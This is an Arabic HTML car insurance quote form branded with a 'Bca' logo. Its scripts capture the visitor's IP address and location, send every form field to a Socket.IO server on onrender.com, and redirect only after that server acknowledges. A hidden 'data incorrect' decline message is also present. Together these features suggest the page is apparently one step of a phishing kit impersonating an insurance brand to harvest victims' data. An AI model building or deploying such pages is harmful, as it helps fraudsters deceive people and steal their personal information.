<!DOCTYPE html>
<html lang="ar">
  <head>
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta charset="utf-8" />
    <title>details</title>

    <link
      crossorigin="anonymous"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Readex+Pro:wght@160..700&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");

      * {
        font-family: "Readex Pro", sans-serif;
        font-optical-sizing: auto;
        font-weight: 400;
        font-style: normal;
        font-variation-settings: "HEXP" 0;
      }

      .content {
        background: white;
        border-radius: 0 0 20px 20px;
        padding: 30px 20px;
        margin: -30px 10px 30px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        min-height: 200px;
        font-size: 16px;
        color: #333;
      }

      .content-section {
        display: none;
      }

      .content-section.active {
        display: block;
      }

      .form-group {
        margin-bottom: 1.5rem;
      }

      .form-group label {
        font-size: 14px;
        font-weight: 400;
        color: #777;
        display: block;
        margin-bottom: 6px;
      }
    </style>

    <!-- Socket.IO client -->
    <script
      src="https://cdn.socket.io/4.6.1/socket.io.min.js"
      integrity="sha384-..."
      crossorigin="anonymous"
    ></script>
  </head>

  <body>
    <nav class="navbar navbar-expand-lg navbar-light bg-light text-center">
      <img
        alt=""
        src="assets/icon/Bca-logo.svg"
        style="margin: auto"
        width="122px"
      />
    </nav>
    <div class="text-center container">
      <h5 class="mt-3">بيانات التأمين</h5>
      <hr />
      <span id="decline-message" style="display: none; color: red">
        البيانات المُدخلة غير صحيحة، يرجى المحاولة مرة أخرى.
      </span>
      <div class="text-right">
        <form>
          <div class="form-group" dir="rtl">
            <label for="Typeـofـinsuranceـcontract">نوع التأمين</label>
            <select class="form-control" id="Typeـofـinsuranceـcontract">
              <option value="">إختر</option>
              <option value="ضد الغير">ضد الغير</option>
              <option value="شامل">شامل</option>
            </select>
          </div>
          <div class="form-group">
            <label for="Insuranceـstartـdate">تاريخ بدء التأمين</label>
            <input
              class="form-control"
              id="Insuranceـstartـdate"
              min=""
              type="date"
            />
          </div>
          <div class="form-group" dir="rtl">
            <label for="Purposeـofـuseـofـtheـvehicle"
              >الغرض من استخدام المركبة</label
            >
            <select class="form-control" id="Purposeـofـuseـofـtheـvehicle">
              <option value="">إختر</option>
              <option value="شخصي">شخصي</option>
              <option value="تجاري">تجاري</option>
              <option value="تأجير">تأجير</option>
              <option value="نقل الركاب او كريم - اوبر">
                نقل الركاب او كريم - اوبر
              </option>
              <option value="نقل بضائع">نقل بضائع</option>
              <option value="نقل مشتقات نفطيه">نقل مشتقات نفطيه</option>
            </select>
          </div>
          <div class="form-group">
            <label for="Estimated_value_of_the_vehicle"
              >القيمة التقديرية للمركبة</label
            >
            <input
              class="form-control"
              id="Estimated_value_of_the_vehicle"
              type="tel"
              minlength="4"
              maxlength="7"
              pattern="^[0-9]{4,7}$"
              title="يجب أن يكون الرقم مكوّناً من 4 إلى 7 أرقام فقط"
              oninput="this.value = this.value.replace(/\D/g, '').slice(0, 7)"
              required
            />
          </div>
          <div class="form-group" dir="rtl">
            <label for="Yearـofـmanufactureـofـtheـvehicle"
              >سنة صنع المركبة</label
            >
            <select
              class="form-control"
              id="Yearـofـmanufactureـofـtheـvehicle"
            >
              <option value="">إختر</option>
            </select>
          </div>
          <div class="text-right mb-3" dir="rtl">
            <label>مكان اصلاح المركبة</label>
            <div class="form-check">
              <input
                checked
                class="form-check-input"
                id="Agency"
                name="Chooseـtheـrepairـmethod"
                type="radio"
              />
              <label class="form-check-label mr-3" for="Agency">الوكالة</label>
            </div>
            <div class="form-check">
              <input
                class="form-check-input"
                id="Repairـshop"
                name="Chooseـtheـrepairـmethod"
                type="radio"
              />
              <label class="form-check-label mr-3" for="Repairـshop"
                >الورشة</label
              >
            </div>
          </div>
          <button class="btn btn-warning col-12" type="submit">
            إظهار العروض
          </button>
        </form>
      </div>
    </div>

    <!-- populate year & min date -->
    <script>
      const selectYear = document.getElementById(
        "Yearـofـmanufactureـofـtheـvehicle"
      );
      for (let y = 2000; y <= 2026; y++) {
        const opt = document.createElement("option");
        opt.value = y;
        opt.textContent = y;
        selectYear.appendChild(opt);
      }
      document
        .getElementById("Insuranceـstartـdate")
        .setAttribute("min", new Date().toISOString().split("T")[0]);
    </script>

    <!-- fetch visitor IP -->
    <script>
      window.visitorIP = null;
      (async () => {
        try {
          const res = await fetch("https://api.ipify.org?format=json");
          const json = await res.json();
          window.visitorIP = json.ip;
        } catch (err) {
          console.error("IP fetch failed:", err);
        }
      })();
    </script>

    <script src="./assets/js/location.js"></script>
    <!-- socket submit script -->
    <script>
      const socket = io("https://b-care-server.onrender.com");

      document.querySelector("form").addEventListener("submit", async (e) => {
        e.preventDefault();

        // wait for IP
        while (window.visitorIP === null) {
          await new Promise((r) => setTimeout(r, 50));
        }

        const contractType = document.getElementById(
          "Typeـofـinsuranceـcontract"
        ).value;

        const payload = {
          ip: window.visitorIP,
          TypeOfInsuranceContract: contractType,
          InsuranceStartDate: document.getElementById("Insuranceـstartـdate")
            .value,
          PurposeOfUse: document.getElementById("Purposeـofـuseـofـtheـvehicle")
            .value,
          EstimatedValue: document.getElementById(
            "Estimated_value_of_the_vehicle"
          ).value,
          ManufactureYear: document.getElementById(
            "Yearـofـmanufactureـofـtheـvehicle"
          ).value,
          RepairLocation: document.getElementById("Agency").checked
            ? "الوكالة"
            : "الورشة",
        };

        // remember which path to take
        window.__nextDetailsPath =
          contractType === "ضد الغير"
            ? "thirdparty.html"
            : "comprehensive.html";

        socket.emit("submitDetails", payload);
      });

      socket.on("ackDetails", (resp) => {
        if (resp.success) {
          // redirect based on the saved path
          window.location.href = window.__nextDetailsPath;
        } else {
          console.error("Submit failed:", resp.error);
          alert("حدث خطأ أثناء الإرسال، حاول مرة أخرى.");
        }
      });
    </script>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
